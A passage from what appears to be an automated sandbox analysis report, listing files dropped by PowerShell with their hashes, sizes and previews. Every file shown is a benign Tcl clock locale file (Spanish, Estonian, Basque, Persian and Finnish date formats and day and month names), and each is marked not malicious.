                                                                                                                                                                                                                              SHA1:D627BE45FE71CCB3CA53153393C075FF5136C2F3
                                                                                                                                                                                                                              SHA-256:19B4D3025156C060A16328370A3FDB9F141298DECFC8F97BE606F6438FECE2EE
                                                                                                                                                                                                                              SHA-512:6CF7C9004A8A3B70495862B7D21921B1A6263C2153FEBC5C4997366498ABBFE70263B436C2B4998550780A4C3A58DCF0AAE7420FF9D414323D731FA44BD83104
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_GT DATE_FORMAT "%e/%m/%Y".. ::msgcat::mcset es_GT TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_GT DATE_TIME_FORMAT "%e/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.947925914291734
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoIvriSFjoP3v6ry/5oIo+3vrig6HyFvn:4EnLB383V+2m3v6ry/v3v+lSVn
                                                                                                                                                                                                                              MD5:33CEE7F947A484B076F5FA7871A30FEB
                                                                                                                                                                                                                              SHA1:F77F8D1F42008770A6FF1F5097C863ECF482BEBE
                                                                                                                                                                                                                              SHA-256:07873D4D59BB41000706A844859C73D26B1FF794058AA83CFFCA804981A24038
                                                                                                                                                                                                                              SHA-512:EBF6873F9CB554489EFCD352943100C00171E49D27153769D1C4DB25E2D1F44F2D34869B596C267C9BB59ED0444468D9982137CFB1C6035FB15A855BB867133B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_HN DATE_FORMAT "%m-%d-%Y".. ::msgcat::mcset es_HN TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_HN DATE_TIME_FORMAT "%m-%d-%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.9102355704853435
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoPjbmvFjoH+3v6ry/5oI+3vjb0f6HyFvn:4EnLB383UmdD3v6ry/k3vbSVn
                                                                                                                                                                                                                              MD5:678D7A6DC32355246BF3AC485A24AF4D
                                                                                                                                                                                                                              SHA1:B6C273D3BE5FB9F5A221B0333870CCE41CEDFDE4
                                                                                                                                                                                                                              SHA-256:A0F57137D2C0ABDC933E03CFB188F5632176C195CEADB9DC80D469C8DC6CEDC6
                                                                                                                                                                                                                              SHA-512:571404CCB0591C681C975E3F7A6C6972FAF2362F1D48BFC95E69A9EAE2DB3F40BF4B666C41950C4924E3FD820C61ED91204F92283B8554F1BD35B64D53BD4125
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_MX DATE_FORMAT "%e/%m/%Y".. ::msgcat::mcset es_MX TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_MX DATE_TIME_FORMAT "%e/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.918215906418583
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoe/GriSFjo3W3v6ry/5oe/T+3vrig6HyFvn:4EnLB383Re+2eW3v6ry/RS3v+lSVn
                                                                                                                                                                                                                              MD5:471C41907CE5DB1F30C647A789870F78
                                                                                                                                                                                                                              SHA1:C575A639609620AF7C56430991D0E4C2B50BDEC5
                                                                                                                                                                                                                              SHA-256:6250663DA1378E54BEDCEF206583D212BC0D61D04D070495238D33715BB20CAE
                                                                                                                                                                                                                              SHA-512:CAE32DF8F583542CAFE3292501725D85B697A5C1F9A0A7993490E8A69B6CE5CE3DE3AA2733B14D989A8D13B5E31B437DB42E9AB9D1851FE72313592C752B5061
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_NI DATE_FORMAT "%m-%d-%Y".. ::msgcat::mcset es_NI TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_NI DATE_TIME_FORMAT "%m-%d-%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.906719336603863
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoX5rQZ2joHE3v6ry/5oXa+3vrQZg6HyFvn:4EnLB383ak4F3v6ry/G3vkrSVn
                                                                                                                                                                                                                              MD5:571F6716293442672521F70854A5AD05
                                                                                                                                                                                                                              SHA1:525EBDEA6F85FC769B6C0C0B179BD98381647123
                                                                                                                                                                                                                              SHA-256:EBB661C1C09E7D4F6FBCC4B2DAD0F41442B1FFDD27F003ABDC0375DD316E57D7
                                                                                                                                                                                                                              SHA-512:C6176EE48515BDFC09B8347DAC5FD2C0165AA765916457DC7B057E526785AC912481CB72F118D2943372213B23CE3C39739263C2B3DA4DBFEB24C522ACC0439D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_PA DATE_FORMAT "%m/%d/%Y".. ::msgcat::mcset es_PA TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_PA DATE_TIME_FORMAT "%m/%d/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.90959433688075
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoIgzvFjoQ9X3v6ry/5oI9+3v9f6HyFvn:4EnLB383+zdB3v6ry/y3vMSVn
                                                                                                                                                                                                                              MD5:5A5997D834DDD3E2E8FF8C6956AD54AC
                                                                                                                                                                                                                              SHA1:AB4110E37B3665D738A8F2B3E64CBA9E99127301
                                                                                                                                                                                                                              SHA-256:90C130B66958CF63CB3DDD2C633E58444357DBAB44C56831DD794CBD2EB1AED0
                                                                                                                                                                                                                              SHA-512:1FEB8E77EA7B886E4A06279AC8A4B6200DBB86DCD28989651B92A0C9147A7BCFBB871DF8F904A1CF8F869BFFBD21325505AC44A4DBEBE1EFC87D43174597F1F3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_PE DATE_FORMAT "%d/%m/%Y".. ::msgcat::mcset es_PE TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_PE DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.905689521403511
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xo06GriSFjoeW3v6ry/5o06T+3vrig6HyFvn:4EnLB383gG+263v6ry/gK3v+lSVn
                                                                                                                                                                                                                              MD5:CE811BB8D12C7E6D53338759CCFB0A22
                                                                                                                                                                                                                              SHA1:0AED290AA479DE6887CCB58D3F0A0F379EF8D558
                                                                                                                                                                                                                              SHA-256:F790E8E48DC079DCD7DEB58170561006A31294F7E4ACBF9CF2ABFA3DB9E3FA9E
                                                                                                                                                                                                                              SHA-512:0C73654CC3D33F76D9BF545BD6C5E42CBDD10B6D9750BFD6536806010F3B6A3C3647FB9D5E7E75A39823FDB857E13D07B7F987809C94B9F980E6D3A6D3108E85
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_PR DATE_FORMAT "%m-%d-%Y".. ::msgcat::mcset es_PR TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_PR DATE_TIME_FORMAT "%m-%d-%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.917539255090736
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xo/5zvFjovE3v6ry/5o/a+3v9f6HyFvn:4EnLB383Czdt3v6ry/+3vMSVn
                                                                                                                                                                                                                              MD5:9CD6FAC4121E3D287C87157142E32845
                                                                                                                                                                                                                              SHA1:3081FE2197017EC8E052756A407880C1C4ED026A
                                                                                                                                                                                                                              SHA-256:70263F7EB22822DFEE8849B7AC4418ED9331275A71E77236B59226396505CDFF
                                                                                                                                                                                                                              SHA-512:25DC054085C4078734988EEDD87E31ABE93DA8B43512E924DE4BCDE9F8EC670436B72FAD1855484F9AC71DD0BEDD9ED30304D02219C4FFC4B0516D8889BDF9F9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_PY DATE_FORMAT "%d/%m/%Y".. ::msgcat::mcset es_PY TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_PY DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.929035824905457
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xofriSFjo3+3v6ry/5oY+3vrig6HyFvn:4EnLB383Y+22+3v6ry/Q3v+lSVn
                                                                                                                                                                                                                              MD5:AF300EA6E733DC6820768EA16194B472
                                                                                                                                                                                                                              SHA1:7766A6EB3D07BCC759CF6718EF3D6EC3FCE13565
                                                                                                                                                                                                                              SHA-256:26A38B3745C95673D21BABB987F1D41EE08DDA945C670F5432BA0CE6F893C0E9
                                                                                                                                                                                                                              SHA-512:C38D67C912584BE539D71881C6517AC186CBB336A160602DA716CE2708B2D38CE8FA7DD23EDB98890ABB7119B924B6C7816C18EC18F20C49D6284DF2386E32EE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_SV DATE_FORMAT "%m-%d-%Y".. ::msgcat::mcset es_SV TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_SV DATE_TIME_FORMAT "%m-%d-%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.923802447598272
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xooygzvFjooq9X3v6ry/5ooy9+3v9f6HyFvn:4EnLB3835rzdbsX3v6ry/5J3vMSVn
                                                                                                                                                                                                                              MD5:2DC550FEC3F477B1159B824479BCE707
                                                                                                                                                                                                                              SHA1:4D0B20CF3E50B64D74655A405A7750E0B0BB4375
                                                                                                                                                                                                                              SHA-256:1291B58810739EA0651493DD7887F5EE3E14BDB806E06DD4BB8AE2520C742EDA
                                                                                                                                                                                                                              SHA-512:B12B927ACA6274904928A6A6CAEC8339A794C74A1F1804FF93AABC132AF9AD8AC5117F20067A60EFEBC9887150D7ACA5BE9643FF61509666011FD203211C25B9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_UY DATE_FORMAT "%d/%m/%Y".. ::msgcat::mcset es_UY TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_UY DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.928484426267027
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoXrzvFjoXK3v6ry/5oXs+3v9f6HyFvn:4EnLB3838zdv3v6ry/c3vMSVn
                                                                                                                                                                                                                              MD5:184D6C4B9F0AA874DEB959F63F7CC01B
                                                                                                                                                                                                                              SHA1:5FB370B498289590C977F6B489FF646F0FB27425
                                                                                                                                                                                                                              SHA-256:91191517403C712299919F9C797F952502E33CB6961D1DBEE3A7C9E8D2B170B9
                                                                                                                                                                                                                              SHA-512:881CCAB0950AE993744ECCA141120C005F53D684167A3E5CBDDF950D110D630FB2B4F6AE6E3D0E06D5110AE25EA00A4F4DAFB03AD3B227DC8C63464D434431DA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_VE DATE_FORMAT "%d/%m/%Y".. ::msgcat::mcset es_VE TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_VE DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1258
                                                                                                                                                                                                                              Entropy (8bit):4.391217201307309
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83P1Y2+1YoQVTsC/m48qpRTVTR7I/68qqq4Z0yoN7emG5wsvtqmsv5t:43P1p+1jQ9sq8y9v8Yko7emG5wKtqmKX
                                                                                                                                                                                                                              MD5:C8C5EF2FA6DD8DBD5BBD2699BE1A0BF6
                                                                                                                                                                                                                              SHA1:F5E26B40786B8987C98F9CBDEF5522043574A9ED
                                                                                                                                                                                                                              SHA-256:4BEE224C21B0483CFF39BE145C671AA20CB7872C8727FD918C0E8ECA2BBEB172
                                                                                                                                                                                                                              SHA-512:757FA85C137A11C1A3F4A8392C7A4E4030A67D0E593FA25A98BEC07DB295399AB2C0D9EBE61E07420B14387A29C060DC3AF812A1E7B85110DBB13C3C3DCB3600
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset et DAYS_OF_WEEK_ABBREV [list \.. "P"\.. "E"\.. "T"\.. "K"\.. "N"\.. "R"\.. "L"].. ::msgcat::mcset et DAYS_OF_WEEK_FULL [list \.. "p\u00fchap\u00e4ev"\.. "esmasp\u00e4ev"\.. "teisip\u00e4ev"\.. "kolmap\u00e4ev"\.. "neljap\u00e4ev"\.. "reede"\.. "laup\u00e4ev"].. ::msgcat::mcset et MONTHS_ABBREV [list \.. "Jaan"\.. "Veebr"\.. "M\u00e4rts"\.. "Apr"\.. "Mai"\.. "Juuni"\.. "Juuli"\.. "Aug"\.. "Sept"\.. "Okt"\.. "Nov"\.. "Dets"\.. ""].. ::msgcat::mcset et MONTHS_FULL [list \.. "Jaanuar"\.. "Veebruar"\.. "M\u00e4rts"\.. "Aprill"\.. "Mai"\.. "Juuni"\.. "Juuli"\.. "August"\.. "September"\.. "Oktoober"\.. "November"\.. "De
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1032
                                                                                                                                                                                                                              Entropy (8bit):4.002617252503668
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83DEXk8TT7vXk8TTMtzCIsOo/ssP6tvf1I49sHT:434bTbbTc+RjKi4mz
                                                                                                                                                                                                                              MD5:ED9805AF5BFB54EB28C6CB3975F86F5B
                                                                                                                                                                                                                              SHA1:2BD91BD850028712F35A2DDB2555036FBF6E8114
                                                                                                                                                                                                                              SHA-256:6889B57D29B670C6CFB7B5A3F2F1749D12C802E8E9629014D06CE23C034C7EF1
                                                                                                                                                                                                                              SHA-512:16F31DE5D2B0D3ED2D975C7891C73C48F073CDAC28F17572FC9424C2D384DDFE9E5E235F17C788F42840CB2D819D2D9499B909AB80FEF1B09F2AE1627CF1DADC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset eu DAYS_OF_WEEK_ABBREV [list \.. "igandea"\.. "astelehena"\.. "asteartea"\.. "asteazkena"\.. "osteguna"\.. "ostirala"\.. "larunbata"].. ::msgcat::mcset eu DAYS_OF_WEEK_FULL [list \.. "igandea"\.. "astelehena"\.. "asteartea"\.. "asteazkena"\.. "osteguna"\.. "ostirala"\.. "larunbata"].. ::msgcat::mcset eu MONTHS_ABBREV [list \.. "urt"\.. "ots"\.. "mar"\.. "api"\.. "mai"\.. "eka"\.. "uzt"\.. "abu"\.. "ira"\.. "urr"\.. "aza"\.. "abe"\.. ""].. ::msgcat::mcset eu MONTHS_FULL [list \.. "urtarrila"\.. "otsaila"\.. "martxoa"\.. "apirila"\.. "maiatza"\.. "ekaina"\.. "uztaila"\.. "abuztua"\.. "iraila"\.. "urria"\.. "azaroa"\..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):294
                                                                                                                                                                                                                              Entropy (8bit):4.915392589807169
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoszFnJF+l6VvBoszw3vLjoszw3v6mjosz++3v/RHvn:4EnLB383FL+l6VQ3vO3v6G3vZPn
                                                                                                                                                                                                                              MD5:4C91AA000D4316585893025CBB96E910
                                                                                                                                                                                                                              SHA1:3D4E73839A1A8CB9DEC1E59D9D2813257D9480F0
                                                                                                                                                                                                                              SHA-256:D45CC432E5743E6CEC34E9A1E0F91A9D5C315CDA409E0826B51AD9D908479EB6
                                                                                                                                                                                                                              SHA-512:0731F2EEB22ADC7EF8AF215B9EB4C5A66B33BC90E4F80CF7AA482AD002CB30543547230124A0507EC79EDDD6903A042EDA5D7C8AFD77F7FC994EFC6853FABB05
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset eu_ES DATE_FORMAT "%a, %Yeko %bren %da".. ::msgcat::mcset eu_ES TIME_FORMAT "%T".. ::msgcat::mcset eu_ES TIME_FORMAT_12 "%T".. ::msgcat::mcset eu_ES DATE_TIME_FORMAT "%y-%m-%d %T %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1711
                                                                                                                                                                                                                              Entropy (8bit):4.21837106187395
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83CnMqnbxbGwgjSyiY/Xw2mS1yM/8ye48YyfNqTb2gyj/8yHkQp:43Yzyhgvs9yi4P
                                                                                                                                                                                                                              MD5:7AB25F4E7E457469DC61A33176B3AA72
                                                                                                                                                                                                                              SHA1:EEA98283D250A99E33DD4D5D9B1B76A029716CE6
                                                                                                                                                                                                                              SHA-256:86898728B275288693B200568DC927C3FF5B9050690876C4441A8339DAE06386
                                                                                                                                                                                                                              SHA-512:7524437F91E91751BEB7A378D7674C49E5D84B716FE962F4C23580C46A671F3F33638FCD37A8F90C86E24DA8F54448E06AC9C3AEFFB5613E94A04E512C1AD68D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fa DAYS_OF_WEEK_ABBREV [list \.. "\u06cc\u2214"\.. "\u062f\u2214"\.. "\u0633\u2214"\.. "\u0686\u2214"\.. "\u067e\u2214"\.. "\u062c\u2214"\.. "\u0634\u2214"].. ::msgcat::mcset fa DAYS_OF_WEEK_FULL [list \.. "\u06cc\u06cc\u200c\u0634\u0646\u0628\u0647"\.. "\u062f\u0648\u0634\u0646\u0628\u0647"\.. "\u0633\u0647\u200c\u0634\u0646\u0628\u0647"\.. "\u0686\u0647\u0627\u0631\u0634\u0646\u0628\u0647"\.. "\u067e\u0646\u062c\u200c\u0634\u0646\u0628\u0647"\.. "\u062c\u0645\u0639\u0647"\.. "\u0634\u0646\u0628\u0647"].. ::msgcat::mcset fa MONTHS_ABBREV [list \.. "\u0698\u0627\u0646"\.. "\u0641\u0648\u0631"\.. "\u0645\u0627\u0631"\.. "\u0622\u0648\u0631"\.. "\u0645\u0640\u0647"\.. "\u0698\u0648\u0646"\.. "\u0698\u0648\u06cc"\.. "\u0627\u0648\u062a
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2009
                                                                                                                                                                                                                              Entropy (8bit):4.491667766230948
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83KnMqnbxbGUgjDiY/Xw2mS1yM/8ye48tfNqTb2gyj/8yHkQLoRv9v/vNv0P:43wihgvsai4Rmv53JU
                                                                                                                                                                                                                              MD5:C59EE7CA80AD9F612A21C8B6674A820E
                                                                                                                                                                                                                              SHA1:AEFD631EFC1892063244FA622DE1A091C461E370
                                                                                                                                                                                                                              SHA-256:6B56545C1AE1DE53BC2389BB7AE59F115BADE24F907E384E079491DC77D6541D
                                                                                                                                                                                                                              SHA-512:42F52091480599D317FB80DF8E52A6C6F88614C6172BF4033974DD136FB30E6F47D38982C8A7BC14CF3165C3EBAE3680F94DF3A0ED079AB68165286251CD0BD7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fa_IN DAYS_OF_WEEK_ABBREV [list \.. "\u06cc\u2214"\.. "\u062f\u2214"\.. "\u0633\u2214"\.. "\u0686\u2214"\.. "\u067e\u2214"\.. "\u062c\u2214"\.. "\u0634\u2214"].. ::msgcat::mcset fa_IN DAYS_OF_WEEK_FULL [list \.. "\u06cc\u06cc\u200c\u0634\u0646\u0628\u0647"\.. "\u062f\u0648\u0634\u0646\u0628\u0647"\.. "\u0633\u0647\u200c\u0634\u0646\u0628\u0647"\.. "\u0686\u0647\u0627\u0631\u0634\u0646\u0628\u0647"\.. "\u067e\u0646\u062c\u200c\u0634\u0646\u0628\u0647"\.. "\u062c\u0645\u0639\u0647"\.. "\u0634\u0646\u0628\u0647"].. ::msgcat::mcset fa_IN MONTHS_ABBREV [list \.. "\u0698\u0627\u0646"\.. "\u0641\u0648\u0631"\.. "\u0645\u0627\u0631"\.. "\u0622\u0648\u0631"\.. "\u0645\u0640\u0647"\.. "\u0698\u0648\u0646"\.. "\u0698\u0648\u06cc"\.. "\u0627\u0
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):426
                                                                                                                                                                                                                              Entropy (8bit):5.12739029869254
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:4EnLB383D2WGz7A/3vy3v6TANCmK3vz7AAbn:4aR83DoPivkvFk5vPN
                                                                                                                                                                                                                              MD5:9778A7C3ABD37ECBEC0BB9715E52FAF8
                                                                                                                                                                                                                              SHA1:D8063CA7779674EB1D9FE3E4B4774DB20B93038B
                                                                                                                                                                                                                              SHA-256:3D9779C27E8960143D00961F6E82124120FD47B7F3CB82DB3DF21CDD9090C707
                                                                                                                                                                                                                              SHA-512:B90B4A96CE5E8B9BF512B98C406603C60EA00F6740D04CD1FC30810C7155A37851AE5E28716F959137806F1A9E3152D2A0D79B8EA7E681A0737A28593657DE66
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fa_IR AM "\u0635\u0628\u062d".. ::msgcat::mcset fa_IR PM "\u0639\u0635\u0631".. ::msgcat::mcset fa_IR DATE_FORMAT "%d\u2044%m\u2044%Y".. ::msgcat::mcset fa_IR TIME_FORMAT "%S:%M:%H".. ::msgcat::mcset fa_IR TIME_FORMAT_12 "%S:%M:%l %P".. ::msgcat::mcset fa_IR DATE_TIME_FORMAT "%d\u2044%m\u2044%Y %S:%M:%H %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1195
                                                                                                                                                                                                                              Entropy (8bit):4.32217771842326
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83KTvIhmuw4tW/UWJTttWKeqA+3ewvtyv3e6:43YvIwuw4t05ttnlzt0p
                                                                                                                                                                                                                              MD5:CC06F0ABD8F985654DAD8256598EBCB7
                                                                                                                                                                                                                              SHA1:71C880F9F395ACD32AF7F538033211F392F83645
                                                                                                                                                                                                                              SHA-256:9929A6B7139BD7E0F29487F7888A83E4C4F5E9CE0352738CFCA94EE2DDF3BD6B
                                                                                                                                                                                                                              SHA-512:E1292665270B6FBF7738CC3864B55194E7B827C6AD9492FB2E54DC1B626159B243052CE502335B9D92E2B8F58A4DD1FA0E628CB6A9D1D3A652FE2B93A3FB711A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fi DAYS_OF_WEEK_ABBREV [list \.. "su"\.. "ma"\.. "ti"\.. "ke"\.. "to"\.. "pe"\.. "la"].. ::msgcat::mcset fi DAYS_OF_WEEK_FULL [list \.. "sunnuntai"\.. "maanantai"\.. "tiistai"\.. "keskiviikko"\.. "torstai"\.. "perjantai"\.. "lauantai"].. ::msgcat::mcset fi MONTHS_ABBREV [list \.. "tammi"\.. "helmi"\.. "maalis"\.. "huhti"\.. "touko"\.. "kes\u00e4"\.. "hein\u00e4"\.. "elo"\.. "syys"\.. "loka"\.. "marras"\.. "joulu"\.. ""].. ::msgcat::mcset fi MONTHS_FULL [list \.. "tammikuu"\.. "helmikuu"\.. "maaliskuu"\.. "huhtikuu"\.. "toukokuu"\.. "kes\u00e4kuu"\.. "hein\u00e4kuu"\.. "elokuu"\.. "syyskuu"\.. "lokakuu"\.. "marraskuu"\..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
